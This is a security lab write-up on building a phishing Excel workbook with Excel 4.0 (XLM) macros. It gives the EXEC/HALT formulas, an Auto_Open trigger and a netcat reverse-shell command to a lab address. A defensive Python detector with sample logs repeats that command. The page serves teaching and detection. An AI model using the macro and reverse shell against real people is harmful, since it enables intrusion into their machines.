Phishing: XLM / Macro 4.0
This lab is based on the research performed by Stan Hegt from Outflank.
Weaponization
A Microsoft Excel spreadsheet can be weaponized by first inserting a new sheet of type "MS Excel 4.0 Macro":
We can then execute commands by typing the following formulas into the cells:
    =exec("c:\shell.cmd")
    =halt()
As usual, the contents of shell.cmd is a simple netcat reverse shell:
c:\shell.cmd
    C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe
Note how we need to rename the A1 cell to Auto_Open if we want the macros to fire off once the document is opened:
Attachments: Excel 4.0 Macro Functions Reference.pdf (5MB, PDF); phishing-xlm.xlsm (8KB, binary)
Execution
Opening the document and enabling Macros pops a reverse shell:
Note that XLM macros allow calling Win32 APIs, so shellcode injection is also possible. See the original research link below for more info.
Observations
As usual, look for any suspicious child processes spawned by Excel.exe:
Having a quick look at the file with a hex editor, we immediately see the suspicious string shell.cmd, which is of course good news for defenders:
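The two observations above (children of Excel.exe, and a tell-tale string in the file) can both be turned into automated checks. The following is an added example written for this page; it is not code from the ired.team lab or from Outflank. The process-creation log lines and the sample workbook are constructed here, and the OOXML layout it inspects (macro sheets under xl/macrosheets/, the Auto_Open defined name stored as _xlnm.Auto_Open in xl/workbook.xml) is an assumption about how Excel saves .xlsm files.

```python
"""Defender-side checks for XLM (Excel 4.0) macro phishing documents.

Added example, not part of the original lab. Log lines and the sample
workbook are constructed; the xl/macrosheets/ and _xlnm.Auto_Open
layout is assumed, not verified against a real Excel-saved file.
"""
import io
import re
import zipfile

# Constructed, Sysmon-like process-creation records (one event per line).
SAMPLE_PROCESS_LOG = r"""
EventID=1 Image=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE ParentImage=C:\Windows\explorer.exe CommandLine="EXCEL.EXE" C:\Users\bob\invoice.xlsm
EventID=1 Image=C:\Windows\System32\cmd.exe ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE CommandLine=cmd /c c:\shell.cmd
EventID=1 Image=C:\tools\nc.exe ParentImage=C:\Windows\System32\cmd.exe CommandLine=C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe
EventID=1 Image=C:\Windows\System32\notepad.exe ParentImage=C:\Windows\explorer.exe CommandLine=notepad.exe
"""

# Keys appear in a fixed order in the constructed log, so a single regex suffices.
PROC_RE = re.compile(r"Image=(?P<image>.+?) ParentImage=(?P<parent>.+?) CommandLine=(?P<cmd>.*)$")


def find_office_children(log_text: str) -> list:
    """Return (image, command line) for every process whose direct parent is Excel.exe."""
    hits = []
    for line in log_text.splitlines():
        m = PROC_RE.search(line)
        if not m:
            continue
        parent = m.group("parent").lower()
        if parent.endswith("\\excel.exe") or parent == "excel.exe":
            hits.append((m.group("image"), m.group("cmd")))
    return hits


# XLM functions that execute code or touch the filesystem (EXEC is the one used in the lab).
XLM_RISKY_FUNCS = re.compile(r"\b(EXEC|CALL|REGISTER|RUN|FOPEN|FWRITE)\s*\(", re.IGNORECASE)
FORMULA_RE = re.compile(r"<f>(.*?)</f>", re.DOTALL)
# Byte strings worth flagging in any workbook part (compared case-insensitively).
SUSPICIOUS_STRINGS = (b"shell.cmd", b"exec(", b"cmd.exe", b"powershell")


def scan_xlsm(data: bytes) -> dict:
    """Inspect an .xlsm (a zip container) for XLM macro sheets, Auto_Open and risky formulas.

    The string check runs on the decompressed zip entries, so it finds
    'shell.cmd' even though the compressed file may not show it in a hex editor.
    """
    findings = {"macrosheets": [], "auto_open": False, "risky_formulas": [], "strings": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            content = zf.read(name)
            text = content.decode("utf-8", errors="replace")
            if name.startswith("xl/macrosheets/"):           # assumed location of XLM sheets
                findings["macrosheets"].append(name)
                findings["risky_formulas"] += [f for f in FORMULA_RE.findall(text)
                                               if XLM_RISKY_FUNCS.search(f)]
            if name == "xl/workbook.xml" and "_xlnm.Auto_Open" in text:  # assumed name
                findings["auto_open"] = True
            lowered = content.lower()
            findings["strings"] += [(name, s.decode()) for s in SUSPICIOUS_STRINGS if s in lowered]
    return findings


def build_sample_xlsm() -> bytes:
    """Construct a minimal in-memory workbook mirroring the lab's two-cell macro sheet."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml",
                    '<workbook><definedNames><definedName name="_xlnm.Auto_Open">'
                    'Macro1!$A$1</definedName></definedNames></workbook>')
        zf.writestr("xl/macrosheets/sheet1.xml",
                    '<macrosheet><sheetData>'
                    '<row r="1"><c r="A1"><f>EXEC("c:\\shell.cmd")</f></c></row>'
                    '<row r="2"><c r="A2"><f>HALT()</f></c></row>'
                    '</sheetData></macrosheet>')
    return buf.getvalue()


if __name__ == "__main__":
    for image, cmd in find_office_children(SAMPLE_PROCESS_LOG):
        print(f"child of Excel.exe: {image}  [{cmd}]")
    for key, value in scan_xlsm(build_sample_xlsm()).items():
        print(f"{key}: {value}")
```

Only direct children of Excel.exe are reported; nc.exe in the sample log is a grandchild via cmd.exe, so a parent-only rule misses it and a real detection would walk the full ancestry or also alert on cmd.exe launched from Office.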
References
Old school: evil Excel 4.0 macros (XLM) | Outflank Blog